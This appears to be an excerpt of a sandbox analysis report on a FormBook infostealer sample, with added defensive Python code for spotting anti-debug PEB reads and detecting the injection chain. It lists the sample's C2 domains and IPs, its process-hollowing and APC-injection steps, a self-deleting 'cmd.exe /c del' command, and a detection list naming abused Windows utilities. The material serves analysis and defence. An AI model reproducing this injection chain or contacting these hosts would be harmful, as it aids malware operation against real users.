          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]4_2_03869240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392EA55 mov eax, dword ptr fs:[00000030h]4_2_0392EA55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038F4257 mov eax, dword ptr fs:[00000030h]4_2_038F4257
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A927A mov eax, dword ptr fs:[00000030h]4_2_038A927A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391B260 mov eax, dword ptr fs:[00000030h]4_2_0391B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391B260 mov eax, dword ptr fs:[00000030h]4_2_0391B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938A62 mov eax, dword ptr fs:[00000030h]4_2_03938A62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388C182 mov eax, dword ptr fs:[00000030h]4_2_0388C182
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389A185 mov eax, dword ptr fs:[00000030h]4_2_0389A185
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892990 mov eax, dword ptr fs:[00000030h]4_2_03892990
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E69A6 mov eax, dword ptr fs:[00000030h]4_2_038E69A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038961A0 mov eax, dword ptr fs:[00000030h]4_2_038961A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038961A0 mov eax, dword ptr fs:[00000030h]4_2_038961A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]4_2_038E51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]4_2_038E51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]4_2_038E51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E51BE mov eax, dword ptr fs:[00000030h]4_2_038E51BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038F41E8 mov eax, dword ptr fs:[00000030h]4_2_038F41E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]4_2_0386B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]4_2_0386B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B1E1 mov eax, dword ptr fs:[00000030h]4_2_0386B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]4_2_03869100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]4_2_03869100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869100 mov eax, dword ptr fs:[00000030h]4_2_03869100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov eax, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120 mov ecx, dword ptr fs:[00000030h]4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389513A mov eax, dword ptr fs:[00000030h]4_2_0389513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389513A mov eax, dword ptr fs:[00000030h]4_2_0389513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388B944 mov eax, dword ptr fs:[00000030h]4_2_0388B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388B944 mov eax, dword ptr fs:[00000030h]4_2_0388B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386C962 mov eax, dword ptr fs:[00000030h]4_2_0386C962
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B171 mov eax, dword ptr fs:[00000030h]4_2_0386B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386B171 mov eax, dword ptr fs:[00000030h]4_2_0386B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869080 mov eax, dword ptr fs:[00000030h]4_2_03869080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3884 mov eax, dword ptr fs:[00000030h]4_2_038E3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E3884 mov eax, dword ptr fs:[00000030h]4_2_038E3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A90AF mov eax, dword ptr fs:[00000030h]4_2_038A90AF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0 mov eax, dword ptr fs:[00000030h]4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov ecx, dword ptr fs:[00000030h]4_2_0389F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov eax, dword ptr fs:[00000030h]4_2_0389F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389F0BF mov eax, dword ptr fs:[00000030h]4_2_0389F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov ecx, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038FB8D0 mov eax, dword ptr fs:[00000030h]4_2_038FB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038658EC mov eax, dword ptr fs:[00000030h]4_2_038658EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03934015 mov eax, dword ptr fs:[00000030h]4_2_03934015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03934015 mov eax, dword ptr fs:[00000030h]4_2_03934015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]4_2_038E7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]4_2_038E7016
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0389002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387B02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03880050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03922073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03931074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03878794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E7794 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0389A70E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0393070D mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0388F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038FFF10 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03864F2E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0389E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03938F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038FFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03930EA5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03938ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038936CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0391FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038776E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038916E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0386C600 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03898E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0389A61C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03921608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0386E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0391FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03877E41 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392AE44 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0388AE73 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03892581 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03862D8A mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0389FD9B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038935A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_039305AC mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03918DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387D5E0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03938D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0386AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038EA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03887D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process token adjusted: Debug
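The `mov eax, dword ptr fs:[00000030h]` hits listed above are the instruction-level evidence behind the "reads the PEB" signature. On its own such a load is unremarkable (ntdll and every CRT do it to reach the loader data); what makes it an anti-debug tell is which PEB field is consumed afterwards, typically BeingDebugged at offset 2 or NtGlobalFlag at offset 0x68. The scanner below is an added illustration, not code from the Joe Sandbox report or from the sample: it finds the byte encodings of these 32-bit loads in a code buffer, records the destination register, and classifies the first follow-up access through that register. `SAMPLE_CODE` is constructed for the demo; the function names and the 16-byte look-ahead window are this example's own choices.

```python
"""Locate 32-bit PEB reads (fs:[30h]) in a code buffer and classify the field used.

Added illustration for the signature hits above; not code from the Joe Sandbox
report or from the sample. SAMPLE_CODE is a constructed byte buffer.
"""
import re
from typing import List, Optional, Tuple

# Register order used by the x86 ModRM reg/rm fields.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def _fs30_load(reg: int) -> bytes:
    # 64 8B /r: FS override, MOV r32, r/m32 with mod=00 rm=101 (disp32), disp32 = 0x30
    return bytes([0x64, 0x8B, (reg << 3) | 0x05, 0x30, 0x00, 0x00, 0x00])


# Every encoding of "mov r32, dword ptr fs:[30h]", mapped to the destination register.
PEB_LOADS = {_fs30_load(r): r for r in range(8)}
PEB_LOADS[b"\x64\xa1\x30\x00\x00\x00"] = 0  # short moffs32 form, eax only (64 A1 disp32)
_LOAD_RE = re.compile(b"|".join(re.escape(p) for p in PEB_LOADS))


def classify_followup(code: bytes, reg: int, window: int = 16) -> Optional[str]:
    """Name the PEB field first touched through `reg` in the bytes after the load.

    Only [reg+disp8] forms are handled; reg == esp would need a SIB byte and is
    skipped. Returns None when no known anti-debug access follows.
    """
    if reg == 4:
        return None
    w = code[:window]
    # cmp byte ptr [reg+2], 0      -> 80 /7, mod=01 rm=reg, disp8 02, imm8 00
    if bytes([0x80, 0x78 | reg, 0x02, 0x00]) in w:
        return "PEB.BeingDebugged"
    # test byte ptr [reg+68h], 70h -> F6 /0, mod=01 rm=reg, disp8 68, imm8 70
    if bytes([0xF6, 0x40 | reg, 0x68, 0x70]) in w:
        return "PEB.NtGlobalFlag"
    for dest in range(8):
        # movzx r32, byte ptr [reg+2] -> 0F B6 /r with mod=01
        if bytes([0x0F, 0xB6, 0x40 | (dest << 3) | reg, 0x02]) in w:
            return "PEB.BeingDebugged"
        # mov r32, dword ptr [reg+68h] -> 8B /r with mod=01
        if bytes([0x8B, 0x40 | (dest << 3) | reg, 0x68]) in w:
            return "PEB.NtGlobalFlag"
    return None


def find_peb_reads(code: bytes, base: int = 0) -> List[Tuple[int, str, Optional[str]]]:
    """Return (address, mnemonic, field-or-None) for every fs:[30h] load in `code`."""
    hits = []
    for m in _LOAD_RE.finditer(code):
        reg = PEB_LOADS[m.group(0)]
        field = classify_followup(code[m.end():], reg)
        hits.append((base + m.start(), f"mov {REGS[reg]}, dword ptr fs:[30h]", field))
    return hits


# Constructed 32-bit code: three PEB loads, two of them feeding classic debugger checks.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                    # push ebp / mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"        # mov eax, fs:[30h]
    b"\x80\x78\x02\x00"                # cmp byte ptr [eax+2], 0      ; BeingDebugged
    b"\x75\x05"                        # jne short
    b"\x64\x8b\x0d\x30\x00\x00\x00"    # mov ecx, fs:[30h]
    b"\xf6\x41\x68\x70"                # test byte ptr [ecx+68h], 70h ; NtGlobalFlag heap flags
    b"\x64\x8b\x15\x30\x00\x00\x00"    # mov edx, fs:[30h]
    b"\x8b\x42\x0c"                    # mov eax, [edx+0Ch]           ; PEB.Ldr, not anti-debug
    b"\x5d\xc3"                        # pop ebp / ret
)

if __name__ == "__main__":
    for addr, insn, field in find_peb_reads(SAMPLE_CODE, base=0x038E7000):
        print(f"{addr:08X}  {insn:<32} {field or '-'}")
```

Run over an unpacked 32-bit image this turns a long list of PEB reads into the handful worth reversing: a load followed by `[reg+2]` or `[reg+68h]` is the debugger check, a load followed by `[reg+0Ch]` is ordinary module enumeration. The 16-byte window is a heuristic; a check split across a branch or a register copy is missed, and a real triage would widen the window or follow the register through the disassembly.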

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.contecoliving.com
Source: C:\Windows\explorer.exe | Domain query: www.constipationhub.com
Source: C:\Windows\explorer.exe | Network Connect: 69.163.220.52 80
Source: C:\Windows\explorer.exe | Domain query: www.identityofplace.com
Source: C:\Windows\explorer.exe | Domain query: www.tententacleshydro.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_6F731000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Section loaded: unknown target: C:\Users\user\Desktop\Y4U48592345670954.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: DD0000
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
Source: explorer.exe, 00000003.00000002.914350326.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.668563200.0000000005E50000.00000004.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
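The chain recorded in this section (the sample re-executes itself, maps memory into explorer.exe and queues an APC there, explorer.exe then resolves and connects to the C2 hosts, a hollowed NETSTAT.EXE is started from the injected shell, and cmd.exe /c del removes the original file) is what an endpoint detection should key on, since each step is visible in ordinary process-creation and network-connection telemetry without seeing the injection itself. The rules below are an added example, not part of the Joe Sandbox report, run over constructed event records modelled on that chain. The PIDs, the dataclass layout, the rule names and the list of utilities beyond netstat.exe in `LOLBIN_IMAGES` are assumptions of this example.

```python
"""Endpoint detection rules for the injection chain shown in this report.

Added example, not part of the Joe Sandbox report. EVENTS is a constructed set of
process-creation and network-connection records modelled on the chain the report
shows; the PIDs are invented, and LOLBIN_IMAGES extends the report's netstat.exe with
other command-line utilities as an assumption of this example.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Event:
    kind: str                      # "process" (creation) or "network" (outbound connect)
    pid: int
    image: str
    ppid: Optional[int] = None
    cmdline: str = ""
    dest_ip: Optional[str] = None
    dest_port: Optional[int] = None


Alert = Tuple[str, int, str]      # (rule, pid, detail)

# Shell/system processes that have no business opening their own HTTP sessions.
SYSTEM_IMAGES = {"explorer.exe", "winlogon.exe", "dllhost.exe"}
# Windows utilities used as hollowing hosts (netstat.exe per the report; the rest assumed).
LOLBIN_IMAGES = {"netstat.exe", "ipconfig.exe", "nslookup.exe", "netsh.exe", "wuauclt.exe"}
_DEL_RE = re.compile(r"""\bdel\b\s+['"]?(?P<target>[^'"]+)""", re.IGNORECASE)


def _base(image: str) -> str:
    return ntpath.basename(image).lower()


def _has_args(cmdline: str) -> bool:
    return len(cmdline.strip().split(None, 1)) > 1


def system_process_network(events: List[Event]) -> List[Alert]:
    """System process connects to network (likely due to code injection)."""
    return [("system_process_network", e.pid, f"{_base(e.image)} -> {e.dest_ip}:{e.dest_port}")
            for e in events if e.kind == "network" and _base(e.image) in SYSTEM_IMAGES]


def self_reexecution(events: List[Event]) -> List[Alert]:
    """A process starting a second copy of its own image (unpacker handing off to a fresh process)."""
    procs = {e.pid: e for e in events if e.kind == "process"}
    return [("self_reexecution", e.pid, e.image)
            for e in procs.values()
            if e.ppid in procs and procs[e.ppid].image.lower() == e.image.lower()]


def shell_spawned_lolbin(events: List[Event]) -> List[Alert]:
    """explorer.exe launching a console utility with no arguments: typical of an injected shell."""
    procs = {e.pid: e for e in events if e.kind == "process"}
    return [("shell_spawned_lolbin", e.pid, f"explorer.exe -> {_base(e.image)} (no arguments)")
            for e in procs.values()
            if _base(e.image) in LOLBIN_IMAGES and e.ppid in procs
            and _base(procs[e.ppid].image) == "explorer.exe" and not _has_args(e.cmdline)]


def lolbin_self_delete(events: List[Event]) -> List[Alert]:
    """cmd.exe deleting a user-writable executable on behalf of a hollowed utility."""
    procs = {e.pid: e for e in events if e.kind == "process"}
    alerts: List[Alert] = []
    for e in procs.values():
        if _base(e.image) != "cmd.exe":
            continue
        m = _DEL_RE.search(e.cmdline)
        parent = procs.get(e.ppid)
        if m and parent and _base(parent.image) in LOLBIN_IMAGES:
            alerts.append(("lolbin_self_delete", e.pid,
                           f"{_base(parent.image)} -> cmd.exe del {m.group('target')}"))
    return alerts


def run_all(events: List[Event]) -> List[Alert]:
    alerts: List[Alert] = []
    for rule in (system_process_network, self_reexecution, shell_spawned_lolbin, lolbin_self_delete):
        alerts.extend(rule(events))
    return alerts


SAMPLE = r"C:\Users\user\Desktop\Y4U48592345670954.exe"
EVENTS = [  # constructed; ordering mirrors the report's chain, PIDs are invented
    Event("process", 3424, r"C:\Windows\explorer.exe", 600, "explorer.exe"),
    Event("process", 2100, SAMPLE, 3424, f"'{SAMPLE}'"),
    Event("process", 2140, SAMPLE, 2100, f"'{SAMPLE}'"),
    Event("network", 3424, r"C:\Windows\explorer.exe", dest_ip="69.163.220.52", dest_port=80),
    Event("network", 3424, r"C:\Windows\explorer.exe", dest_ip="34.102.136.180", dest_port=80),
    Event("process", 2400, r"C:\Windows\SysWOW64\NETSTAT.EXE", 3424, "NETSTAT.EXE"),
    Event("process", 2410, r"C:\Windows\SysWOW64\cmd.exe", 2400, f"/c del '{SAMPLE}'"),
]

if __name__ == "__main__":
    for rule, pid, detail in run_all(EVENTS):
        print(f"{rule:<24} pid={pid:<5} {detail}")
```

Each rule is deliberately weak on its own (explorer.exe does make legitimate connections, and an analyst typing `netstat` from a shortcut would trip the no-arguments rule); the point is that all four fire on one short chain, so a correlation on parent/child PIDs within a few seconds, rather than any single rule, is what should page someone.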

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | the same 14 file sources (8 MEMORY dumps and 6 UNPACKEDPE files) listed under Stealing of Sensitive Information

MITRE ATT&CK Matrix

Bracketed digits are the hit counters the report renders as superscripts on a technique cell, reproduced as exported.

